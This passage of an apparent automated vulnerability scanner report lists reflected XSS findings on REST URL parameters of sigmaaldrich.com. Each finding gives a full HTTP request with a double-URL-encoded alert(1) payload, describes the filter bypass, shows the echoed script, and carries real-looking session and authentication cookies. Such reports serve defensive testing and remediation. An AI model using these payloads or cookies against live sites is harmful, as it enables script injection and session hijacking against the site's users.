Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:08 GMT
Content-Length: 28999
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest79af7";alert(1)//5a3e73ff3ff/chemistry/chemical-synthesis/chemical-synthesis-catalog","E404") ;
   </script>
...[SNIP]...

1.91. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 458ee%2522%253balert%25281%2529%252f%252fb83b48b40d0 was submitted in the REST URL parameter 4. This input was echoed as 458ee";alert(1)//b83b48b40d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/chemistry458ee%2522%253balert%25281%2529%252f%252fb83b48b40d0/chemical-synthesis/chemical-synthesis-catalog HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:16 GMT
Content-Length: 28999
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/chemistry458ee";alert(1)//b83b48b40d0/chemical-synthesis/chemical-synthesis-catalog","E404") ;
   </script>
...[SNIP]...

1.92. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 228fc%2522%253balert%25281%2529%252f%252f2869de04022 was submitted in the REST URL parameter 5. This input was echoed as 228fc";alert(1)//2869de04022 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis228fc%2522%253balert%25281%2529%252f%252f2869de04022/chemical-synthesis-catalog HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:18 GMT
Content-Length: 28999
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis228fc";alert(1)//2869de04022/chemical-synthesis-catalog","E404") ;
   </script>
...[SNIP]...

1.93. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2709f%2522%253balert%25281%2529%252f%252f9678c1644d6 was submitted in the REST URL parameter 6. This input was echoed as 2709f";alert(1)//9678c1644d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog2709f%2522%253balert%25281%2529%252f%252f9678c1644d6 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:20 GMT
Content-Length: 28999
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog2709f";alert(1)//9678c1644d6","E404") ;
   </script>
...[SNIP]...

1.94. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/chemistry/stockroom-reagents [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/chemistry/stockroom-reagents

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b13e8%2522%253balert%25281%2529%252f%252f355ca655f70 was submitted in the REST URL parameter 1. This input was echoed as b13e8";alert(1)//355ca655f70 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /contentb13e8%2522%253balert%25281%2529%252f%252f355ca655f70/sigma-aldrich/areas-of-interest/chemistry/stockroom-reagents HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:07 GMT
Content-Length: 28972
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/contentb13e8";alert(1)//355ca655f70/sigma-aldrich/areas-of-interest/chemistry/stockroom-reagents","E404") ;
   </script>
...[SNIP]...

1.95. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/chemistry/stockroom-reagents [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/chemistry/stockroom-reagents

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eaa45%2522%253balert%25281%2529%252f%252ff70af8ceeb6 was submitted in the REST URL parameter 2. This input was echoed as eaa45";alert(1)//f70af8ceeb6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldricheaa45%2522%253balert%25281%2529%252f%252ff70af8ceeb6/areas-of-interest/chemistry/stockroom-reagents HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
